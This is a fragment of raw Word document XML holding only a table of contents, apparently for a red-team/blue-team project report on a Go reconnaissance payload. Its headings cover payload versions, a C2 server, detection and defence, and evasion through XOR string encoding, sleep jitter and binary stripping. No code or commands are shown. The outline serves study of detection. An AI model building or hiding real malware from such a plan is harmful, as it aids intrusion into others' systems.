            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="040653A0" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00ED54EA">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc226583748" w:history="1">
            <w:r w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1  High-Level Architecture</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583748 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="01C2E1A4" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00ED54EA">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc226583749" w:history="1">
            <w:r w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2  Project Directory Structure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583749 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C57131E" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00ED54EA">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc226583750" w:history="1">
            <w:r w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4. Implementation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583750 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="238524C5" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00ED54EA">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc226583751" w:history="1">
            <w:r w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1  Development Environment</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583751 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="45E04CE4" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00ED54EA">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc226583752" w:history="1">
            <w:r w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2  Payload Versions</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583752 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48F2B0ED" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00ED54EA">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc226583753" w:history="1">
            <w:r w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Version 1 — Basic Recon (net_scan.go)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583753 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="217A55BB" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00ED54EA">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc226583754" w:history="1">
            <w:r w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Version 2 — Expanded Recon (net_scan_v2.go)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583754 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6D37B468" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00ED54EA">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc226583755" w:history="1">
            <w:r w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Version 3 — Full Payload (net_scan_v3.go)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583755 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D10F2F2" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00ED54EA">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc226583756" w:history="1">
            <w:r w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3  C2 Server</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583756 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E44D673" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00ED54EA">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc226583757" w:history="1">
            <w:r w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5. Blue Team Analysis — Detection and Defence</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583757 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="11E3DDE2" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00ED54EA">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc226583758" w:history="1">
            <w:r w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1  Host-Based Detection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583758 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6DC3F45A" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00ED54EA">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc226583759" w:history="1">
            <w:r w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2  Network-Based Detection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583759 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="118204F4" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00ED54EA">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc226583760" w:history="1">
            <w:r w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3  Pyramid of Pain — What the Current Payload Bypasses</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583760 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4404B99D" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00ED54EA">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc226583761" w:history="1">
            <w:r w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6. Obfuscation Phase</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583761 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0451A5FD" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00ED54EA">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc226583762" w:history="1">
            <w:r w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.1  XOR String Encoding — Implementation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583762 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4B59883E" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00ED54EA">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc226583763" w:history="1">
            <w:r w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2  Sleep Jitter — Implementation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583763 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44CC883E" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00ED54EA">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc226583764" w:history="1">
            <w:r w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.3  Binary Stripping — Implementation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583764 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75938491" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00ED54EA">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc226583765" w:history="1">
            <w:r w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Build Commands</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583765 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3751AAE8" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00ED54EA">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc226583766" w:history="1">
            <w:r w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Before and After — What Ghidra Sees</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583766 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5316666A" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00ED54EA">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc226583767" w:history="1">
            <w:r w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Key Limitation — The .gopclntab Section</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583767 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
